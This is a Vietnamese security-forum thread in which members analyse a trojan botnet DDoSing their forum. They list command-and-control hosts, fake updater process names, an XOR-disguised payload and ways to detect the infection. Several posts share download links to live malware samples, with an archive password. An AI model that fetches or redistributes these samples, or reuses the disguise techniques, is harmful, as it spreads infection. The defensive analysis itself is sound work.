[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 18:28:13 (+0700) | #56 | 244037
cayaoanh830
Member
[Minus] 0 [Plus]
Joined: 13/06/2011 09:34:01
Bài gởi: 37
Đến từ: Nowhere
Offline
[Profile] [PM] [Email] [Yahoo!]
Theo như sự phân tích ở trên thì các vụ tấn công Ddos đều giả các cuộc lức wed bình thường nhưng dù gì thì máy tính vẫn là máy tính nó không có trí thông minh bằng người chế tạo ra nó được nó cũng chỉ làm theo những dòng code có sẵn. dựa vào sự suy nghĩ trên em nghĩ ra được 1 cách không biết có được không nếu có gì sai xin các bác bỏ qua cho em . dừng chém em tội nghiệp em lắm smilie :
=>Tại sau chúng ta không phân biệt sự truy cập đó là người hay là máy bằng cách đưa ra các câu hỏi (như 10+5 = ? hoặc đưa ra một từ tiếng anh mất 1 chữ và nghĩa tiếng việt của nó để ta điền vào ...) để người nào muốn truy cập vào một trang bất kì của HVA cũng phải giải nó.
...Yesterday - Today - Tomorrow...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 18:47:39 (+0700) | #57 | 244040
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
cayaoanh830 wrote:
Theo như sự phân tích ở trên thì các vụ tấn công Ddos đều giả các cuộc lức wed bình thường nhưng dù gì thì máy tính vẫn là máy tính nó không có trí thông minh bằng người chế tạo ra nó được nó cũng chỉ làm theo những dòng code có sẵn. dựa vào sự suy nghĩ trên em nghĩ ra được 1 cách không biết có được không nếu có gì sai xin các bác bỏ qua cho em . dừng chém em tội nghiệp em lắm smilie :
=>Tại sau chúng ta không phân biệt sự truy cập đó là người hay là máy bằng cách đưa ra các câu hỏi (như 10+5 = ? hoặc đưa ra một từ tiếng anh mất 1 chữ và nghĩa tiếng việt của nó để ta điền vào ...) để người nào muốn truy cập vào một trang bất kì của HVA cũng phải giải nó.



Đến lúc đống zombie đó kết nối được đến tầng này thì chắc server nào bị dội cũng sụm bà chè rồi. Hehe
Em vừa vọc vài thứ trong máy, có lòi ra mấy URL (via whireshark):
http://tongfeirou.dyndns-web.com/banner1.png?cpn=<COMPUTER USERNAME> (404)
https://biouzhen.dyndns-server.com/banner1.png?cpn=<COMPUTER USERNAME> (403 nginx)


với User-Agent đều là:
Gozilla_2/General (??)


Đang tiếp tục vọc tiếp ...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 19:21:30 (+0700) | #58 | 244042
cayaoanh830
Member
[Minus] 0 [Plus]
Joined: 13/06/2011 09:34:01
Bài gởi: 37
Đến từ: Nowhere
Offline
[Profile] [PM] [Email] [Yahoo!]
Các bác phân tích con "AcrobatUpdater.exe" bằng chương trình gì vậy?
...Yesterday - Today - Tomorrow...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 19:44:37 (+0700) | #59 | 244043
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Bằng các công cụ đã post ở đây: http://www.hvaonline.net/hvaonline/posts/list/2865.hva

Giữa 1 rừng malware của STL, em giờ rối luôn, không biết tiếp tục với thằng nào cho xong được khoãng 80-90% ?

Hiện tại, cả em và anh conmale đều chưa xác định được thằng nằm vùng nào đã download images01.gif về rồi xor toàn bộ file content với 0x19 để cho ra AcrobatUpdater.exe.

Theo lời cao thủ trẻ tuổi acoustics89 (tiết lộ luôn, chứ cứ phải viết cao thủ trẻ tuổi giấu mặt thì mệt quá) thì GoogleCrashHandler.exe down nó về. Nhưng GoogleCrashHandler.exe thì có lẽ mấy cái AV gặp là nó nhai xương rồi.

Vậy ai download AcrobatUpdater.exe về, GoogleCrashHandler.exe hay còn 1 thằng .exe/.dll/.xxx giấu mặt nào khác mà anh em ta chưa biết. Nếu còn chưa xác định được thằng nằm vùng này, chúng ta còn phải chạy theo STL dài dài smilie

Có vài tool free, nhỏ gọn, không cần install, tụi mạn phép đề nghị anh em khách, thành viên HVA nào không có Wireshark nên down về kiểm tra máy mình:
1. CurrPorts:http://www.nirsoft.net/utils/cports.html
2. SmartSniff: http://www.nirsoft.net/utils/smsniff.html

Down và extract ra, run 1 trong 2, đóng mọi kết nối Internet không cần thiết như Chat, Browser. Quan sát xem process nào connect tới tienve.org, port 80. Process đó chính là bot.
Xem Process nào connect tới penop.net hoặc bất cứ host lạ nào: thằng này là thằng nằm vùng.

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 20:48:57 (+0700) | #60 | 244044
[Avatar]
tanviet12
Member
[Minus] 0 [Plus]
Joined: 10/05/2010 12:15:15
Bài gởi: 138
Đến từ: TP - HCM
Offline
[Profile] [PM] [Email]
Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi.


Hix, ngày xưa em cũng từng cài rất nhiều máy windows. Toàn cho người dùng với quyền administrator, bởi không bị giới hạn trong cài đặt phần mềm... Nhưng lâu rồi thì mới biết, những mấy như thế rất dễ bị virus, "mèo què" gây hại, bởi hiểu một cách đơn giản: dễ với mình thì cũng dễ với mã độc.

Bởi vậy, nếu có cách anh chị nào hay cài đặt PC cho bạn bè, người thân, máy tính của công ty mình. Lưu ý nên cài với user bình thường, tạo các policy để giới hạn quyền... Phòng bênh trước khi chữa bệnh!
BTV
fb.com/buitanviet

PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
lequi wrote:

Em vừa vọc vài thứ trong máy, có lòi ra mấy URL (via whireshark):
http://tongfeirou.dyndns-web.com/banner1.png?cpn=<COMPUTER USERNAME> (404)
https://biouzhen.dyndns-server.com/banner1.png?cpn=<COMPUTER USERNAME> (403 nginx)


với User-Agent đều là:
Gozilla_2/General (??)


Đang tiếp tục vọc tiếp ...


1- Bạn lequi, tôi đã có đủ thông tin về 2 website (dynamic domain system) này rồi.
Nhưng đề nghị bạn cung cấp thêm các thông tin cần thiết sau đây:

- Tên Service, process trong hệ thống kích hoạt các kết nối Internet (Internet connection) đến các URL nói trên?

(Có phải Service Name là wuauservcom và process là wuauclt.exe hay không? Cũng có nghĩa là trong C\ProgramFiles\Common Files của máy bạn có xuất hiện một folder mới (bình thường không có) tên là "Windows Update Components", trong folder này có các file: wuauclt.exe, wuauserv.dll và UsrClass.ini hay không? Chú ý là nôi dung trong UsrClass.ini được XOR-encrypted, ghi đia chỉ của master website. Trong trường hơp của ban, chúng phải là http://tongfeirou.dyndns-web.com và http://biouzhen.dyndns-server.com. Có đúng như vậy không?
Các file wuauclt.exe, wuauserv.dll cũng còn phải nằm ở C\WINDOWS\system32\setup nữa. )

- Chúng là các process riêng biệt hay chỉ một process kích hoạt kết nối đến cả hai URL nói trên?

- Có service, process nào kích hoạt kết nối liên tục đến hvaonline.net hay tienve.org không? (tức là service này đang DDoS đến HVA)

2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau:

- AdobeUpdateManager.exe
- jucheck.exe (process giả update Java)
- OSA.exe
Chúng nằm ở các directories sau:

Program Files\Adobe\AdobeUpdateManager.exe
Program Files\Java\jre6\bin\jucheck.exe
Program Files\Microsoft Office\Office11\OSA.exe

Chúng cũng là thành phần của Trojan-bot đấy

3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả

Thank you in advance.





The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 00:26:46 (+0700) | #62 | 244048
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết).

Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315
Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 06:07:35 (+0700) | #63 | 244050
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
lequi wrote:
@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết).

Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315
Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169


OK! Cám ơn ban lequi. File UnikeySetup này có virus-trojan đấy, dù rằng một số Antivirus nổi tiếng như McAfee Antivirus Enterprise (newest version- up to date) không phát hiện ra
Tôi sẽ ngâm cứu nó.
Ngoài ra xin ban gửi Cache file của whireshark liên quan, cached từ máy của bạn vừa qua

Again thank you!

The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 06:10:35 (+0700) | #64 | 244051
Nesbit
Member
[Minus] 0 [Plus]
Joined: 26/06/2011 14:06:24
Bài gởi: 2
Offline
[Profile] [PM]
Xin lỗi mọi người, cho em xen ngang một tí.

conmale wrote:

Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe?

Nếu STL thâm nhập trang web của Adobe và thay file trên đó bằng file của nó liệu có được không anh? Đó là một giả thiết thôi smilie, coi bộ không khả thi (nhưng với trang web của Unikey thì chắc là có thể anh nhỉ, trang đó lâu lắm rồi không update. Em nhắc tới Unikey vì thấy trong các topic của anh TQN).
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 07:21:09 (+0700) | #65 | 244054
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Dạo qua một vòng thì thấy số lượng các link cho phép tải unikey và vietkey từ những trang upload miễn phí (như megaupload) nhiều vô kể. Thử download vài cái xuống kiểm nghiệm thì 10/10 là malware smilie.

Có những diễn đàn chính admin của diễn đàn ấy quảng bá và phát tán những malware này (có chủ ý hoặc vô tình vì không biết).

Đúng là một bức tranh xám xịt.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 09:19:43 (+0700) | #66 | 244065
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
Chào mọi người, theo phân tích của anh conmale thì mình biết chắc chắn máy mình đã bị dính virus của STL.










Sau khi mình xoá Acrobatupdate.exe và xoá hết registry và dùng chương trình Avira thì Avira phát hiện ra trojan trong hình dưới và Acrobatupdate không chạy nữa. Nếu mình tắt chương trình Avira đi thì nó lại chạy trở lại.







Mình có thể cung cấp những gì cho diễn đàn để diệt con virut này.




No Signature
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 09:31:36 (+0700) | #67 | 244067
nobitapm
Member
[Minus] 0 [Plus]
Joined: 21/07/2008 13:54:41
Bài gởi: 5
Offline
[Profile] [PM]
PXMMRF wrote:

2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau:

- AdobeUpdateManager.exe
- jucheck.exe (process giả update Java)
- OSA.exe
Chúng nằm ở các directories sau:

Program Files\Adobe\AdobeUpdateManager.exe
Program Files\Java\jre6\bin\jucheck.exe
Program Files\Microsoft Office\Office11\OSA.exe

Chúng cũng là thành phần của Trojan-bot đấy

3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả

Thank you in advance.




E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên.
Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 09:39:49 (+0700) | #68 | 244068
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
asaxin wrote:
Chào mọi người, theo phân tích của anh conmale thì mình biết chắc chắn máy mình đã bị dính virus của STL.










Sau khi mình xoá Acrobatupdate.exe và xoá hết registry và dùng chương trình Avira thì Avira phát hiện ra trojan trong hình dưới và Acrobatupdate không chạy nữa. Nếu mình tắt chương trình Avira đi thì nó lại chạy trở lại.







Mình có thể cung cấp những gì cho diễn đàn để diệt con virut này.







Khởi động lại Windows ở chế độ safe mode hoặc boot vào bằng Hiren cd rồi xoá hết nội dung trong c:\windows\tmp và c:\windows\temp
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 09:48:31 (+0700) | #69 | 244070
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
Cảm ơn anh conmale.

@all: đây là link Acrobatupdate: http://www.mediafire.com/?cqaybxjc88g4riq
@bolzano_1989: mình đã gửi email cho bạn. đây link download: http://www.mediafire.com/?o9nwgu69x7tde22

pasword extract: malware
No Signature
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 09:48:41 (+0700) | #70 | 244071
tv_X
Member
[Minus] 0 [Plus]
Joined: 17/05/2005 03:39:32
Bài gởi: 1
Offline
[Profile] [PM]
Ồ!
Kiểm tra các bộ gõ vietkey2007 mà mình thường dùng và thường cài cho mọi người khi check trên http://www.virustotal.com thì dính dày đặc trojan và backdoor

đầy là 2 chương trình vietkey 2007 tiêu biểu:

http://www.virustotal.com/file-scan/report.html?id=438175b61d7f81c99b11a6c2e6ba20b98340f3a308731b889ad4bd1c2a34b939-1311091197


http://www.virustotal.com/file-scan/report.html?id=9495bd9f8fd9b0421615baeafd52e81a5c63e4003215a7c23bf5d97e59807d5d-1308413546

Vậy mà Avira, câp nhật hàng ngày không phát hiện được

khiếp thế, remove khẩn cấp!


[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 09:50:54 (+0700) | #71 | 244072
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
Trước khi bạn asaxin xoá các file trong c:\windows\tmp và c:\windows\temp, xin bạn tạm thời tắt Avira rồi nén lại các thư mục này và gửi mình qua địa chỉ email sau để CMC Antivirus được cập nhật:





Xin cảm ơn.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 10:41:56 (+0700) | #72 | 244073
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
TQN wrote:
Chết là chết trong thời gian ngắn đó đấy anh PXM. Tụi nó sẽ cập nhật bot mới lập tức, setup URL download mới lập tức, hy sinh AcrobatUpdater và các URL cũ. Mình sẽ vẫn bị đánh tiếp.
File config mới xc.jpg đã không ra lệnh tắt DDOS vào HVA, mà chỉ thay = dòng trêu chọc đó. Một lượng Bot lớn còn lại vẫn theo config cũ mà dập vào HVA ta.

Đúng là nhức đầu. Giờ ta có dập được cái host direct.aliasx.net thì vẫn bị DDOS, chỉ còn nước tận diệt các bot còn tồn tại và nhanh chóng tìm ra bot mới.

Nếu ISP can thiệp, tui nghĩ họ nên firewall 2 host penop.net và direct.aliasx.net.

Bà con nào phát hiện AcrobatUpdater.exe mình và biết cách dùng Wireshark, CommView, TCPView hay SmartSniff (của Nirosoft) có thể giúp mọi người bằng cách: đừng xoá AcrobatUpdater.exe theo dõi thử AcrobatUpdater.exe connect tới host nào, URL ra sao, UserAgent như thế nào ?



Từ hôm qua đến giờ, mỗi lần em bật máy lên là liên tục mỗi phút, máy em tự động check và download (nếu có thể) các file từ các địa chỉ mà anh đã gửi ở trên cùng 2 địa chỉ khác ở các host của STL mà em có.
Anh chị em nếu phát hiện các địa chỉ file khác mà virus của đám STL tải về có thể gửi cho em qua tin nhắn riêng để em cùng theo dõi phụ.
Ngặt nỗi, em không có máy online 24/24 để theo dõi liên tục mọi lúc đám virus STL này.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 11:08:21 (+0700) | #73 | 244075
[Avatar]
rookey
Member
[Minus] 0 [Plus]
Joined: 01/06/2010 09:04:24
Bài gởi: 22
Đến từ: hồ chí minh
Offline
[Profile] [PM] [Yahoo!]
Xin chào mọi người, em theo dõi topic này ngay từ đầu cũng như các topic mà anh TQN đề cập tới STL.
Việc đọc các kỹ thuật phân tích các mẫu virus và cách hoạt động của nó khiến em rất thích tham gia, rất tò mò vì em cũng là it (học năm 3).Mấy anh phân tích rùi post lên cho tất cả mọi người xem và tham gia.Nhưng em chắc có nhiều người như em muốn cùng phân tích và tham gia vào thảo luận chủ đề nhưng kiến thức mà REC mấy mẫu đó thì không có mà chỉ bít đọc code thôi.
Nay em có ý kiến này : trong quá mấy anh RCE mấy mẫu virus đó thì tốn rất nhiều thời gian mà không được đồng lương nào mà vì nền it nước nhà, chống lại kể xấu phá hoại và giúp mọi người phòng tránh thì nhờ máy anh chi thêm tí thời gian gõ lại cách RCE, các tools đã sử dụng,những vấn đề gặp phải khi RCE và cách xử lý để thành công, xem đó là một tài liệu quí giá rồi đưa lên diễn đàn kết quả cũng như file tài liệu đó cho mọi người tham khảo học hỏi.Việc đó coi như đàn anh dạy lại cho đàn em, chúng ta cùng hiểu biếu hơn.
Ý em nêu như trên mấy anh thấy thế nào ạ.
Những gì em nói đầu là mong muốn thật lòng của em nếu có gì không hợp lệ thì mấy anh bỏ qua.
Cám ơn.
Thích nghi không có nghĩa là cơ hội,không có nghĩa là chống lại,mà là tìm cách vượt qua nó!
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 11:12:02 (+0700) | #74 | 244076
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Khoan khoan asaxin !
Cảm ơn cậu, đã chụp được rồi. Cậu up luôn mấy cái file .msi trong thư mục Temp đó luôn.
Vấn đề quan trọng nhất bây giờ là xem thằng nào sinh ra mấy cái file .msi đó (.exe giả đuôi .msi: Microsoft Installer).
Tạm tắt Avira đi, run FileMon hay ProcMon của SysInternal lên, xem thằng process nào sinh ra mấy cái giả danh đó. Up thằng exe đó lên, và up luôn hình các dll mà thằng process đó dùng luôn.
Thằng đó là thằng nằm vùng đấy, chính nó down AcrobatUpdater.exe về để bot !
Gấp, khẩn cấp, làm ngay, anh em đang chờ thộp cổ thằng nằm vùng giấu mặt này !
Wireshark không hiển thì process connect được, cậu asaxin down ngay TCPView (SysInternals) hay CurrPorts, SmartSniff của NirSoft: http://www.nirsoft.net về.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 11:21:33 (+0700) | #75 | 244077
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
TQN wrote:
Khoan khoan asaxin !
Cảm ơn cậu, đã chụp được rồi. Cậu up luôn mấy cái file .msi trong thư mục Temp đó luôn.
Vấn đề quan trọng nhất bây giờ là xem thằng nào sinh ra mấy cái file .msi đó (.exe giả đuôi .msi: Microsoft Installer).
Tạm tắt Avira đi, run FileMon hay ProcMon của SysInternal lên, xem thằng process nào sinh ra mấy cái giả danh đó. Up thằng exe đó lên, và up luôn hình các dll mà thằng process đó dùng luôn.
Thằng đó là thằng nằm vùng đấy, chính nó down AcrobatUpdater.exe về để bot !
Gấp, khẩn cấp, làm ngay, anh em đang chờ thộp cổ thằng nằm vùng giấu mặt này !
Wireshark không hiển thì process connect được, cậu asaxin down ngay TCPView (SysInternals) hay CurrPorts, SmartSniff của NirSoft: http://www.nirsoft.net về.


Hì hì, anh bậy thiệt. Sáng giờ lung tung công việc nên anh trả lời asaxin theo quán tính mà quên bà nó chuyện kêu asaxin lưu lại mấy miếng rác đó. Hy vọng asaxin chưa xoá nó smilie .
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 11:25:03 (+0700) | #76 | 244079
thegunner2401
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 06:35:07
Bài gởi: 2
Offline
[Profile] [PM]
Sao hiện tại E vào internet (bằng cả Chrome và FireFox), nhất là vào HVAonline
Check CurPorts đều thấy kết nối đến thutin.tienve.org:80 mà thằng Process là Trình duyệt?
E nên làm thế nào bây h? (Newbie nên ko biết gì, các A thông cảm).smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 11:26:11 (+0700) | #77 | 244080
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
Nếu bạn asaxin gặp khó khăn trong việc dùng Process Monitor, bạn có thể gửi boot log với Process Monitor, mình sẽ xem và hướng dẫn chi tiết cho bạn.

Hướng dẫn scan và gửi boot log với Process Monitor
http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 11:27:26 (+0700) | #78 | 244081
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
thegunner2401 wrote:
Sao hiện tại E vào internet (bằng cả Chrome và FireFox), nhất là vào HVAonline
Check CurPorts đều thấy kết nối đến thutin.tienve.org:80 mà thằng Process là Trình duyệt?
E nên làm thế nào bây h? (Newbie nên ko biết gì, các A thông cảm).smilie


thutin.tienve.org và www.hvaonline.net chạy trên cùng 1 IP cho nên đây là chuyện bình thường, chẳng có gì phải ngại hết.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 11:55:50 (+0700) | #79 | 244082
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
nobitapm wrote:
PXMMRF wrote:

2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau:

- AdobeUpdateManager.exe
- jucheck.exe (process giả update Java)
- OSA.exe
Chúng nằm ở các directories sau:

Program Files\Adobe\AdobeUpdateManager.exe
Program Files\Java\jre6\bin\jucheck.exe
Program Files\Microsoft Office\Office11\OSA.exe

Chúng cũng là thành phần của Trojan-bot đấy

3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả

Thank you in advance.




E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên.
Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w




Mẫu này không phải virus, bạn yên tâm nhé
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 11:57:39 (+0700) | #80 | 244083
[Avatar]
wỷnhỏ
Member
[Minus] 0 [Plus]
Joined: 27/06/2011 11:26:17
Bài gởi: 7
Offline
[Profile] [PM] [WWW]
smilie....hjx.tình hình dạo này nhiều máy nhiễm virus of bọn STL quá mấy a nhỉ
e cứ download linh tinh mà k bít có nhiễm cái gì k vì kaspersky bản quyền nhà e e quét mà chẳng thấy báo gì
mà bác TQL đóng góp nhiều như vậy mà sao mấy bác Admin k cho bác TQL lên MOD hay Smod ạ???
ai cũng nhiệt tình và tốt như mấy bác thì hay biết mấy.....e thì gà quá smilie(smilie(smilie(
I want to make friend with you...smiliesmiliesmilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:03:51 (+0700) | #81 | 244085
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Không sao đâu quỷ nhỏ, anh còn đề nghị anh conmale cho anh xuống member bình thường kìa.
Nâng cấp cho anh thì có trả lương được cho anh không ? Chỉ cần ai đó gởi anh vài thùng để uống lai rai trong lúc RCE đám "mèo què" của STL thôi !

Sáng giờ lang thang An Sương, QL 1, xa lộ Hà nội, thấy buồn: kinh tế VN ta năm nay khó khăn quá, nhiều công ty, cửa hàng dẹp tiệm, trả mặt bằng, làm ăn khó khăn, lạm phát tăng cao, lãi suất NH tăng, đứng hết.

Anh PXM cũng bên SX-KD, có đồng ý với em là năm nay tình hình vậy không ? Vậy mà đám bán nước, tay sai ngoại bang như STL còn "quậy" lên nữa !

Bây giờ chỉ ngồi chờ asaxin chụp được thằng nằm vùng giấu mặt và up lên để anh em ta chặn hết đường DDOS của tụi nó !

2 Nobitapm: file jucheck.exe đó của em là file sạch, chính hãng Sun, bảo hành đàng hoàng. Máy em install Win7 64bit à ?

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:06:17 (+0700) | #82 | 244086
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
@asaxin: về file Acrobatupdate: mẫu bạn đưa đúng là mẫu của STL mà anh em đang bàn đến, nhưng tiếc là bây giờ, mẫu naỳ cũng không còn giá trị vì STL không còn update file cấu hình nữa

Mình đã check thư mục temp của bạn, không còn file nào khác là virus. Bạn theo hướng dẫn của anh conmale mà xoá hết các key registry, xoá file của nó là được
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:08:56 (+0700) | #83 | 244088
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Ặc ặc, acoustics90 lại xúi bậy rồi. Chờ asaxin up lên thằng nào down AcrobeUpdater.exe về chứ. Phải có thằng down về thì mới có AcrobatUpdater.exe chứ. Không lẽ nó tự sinh ra à !
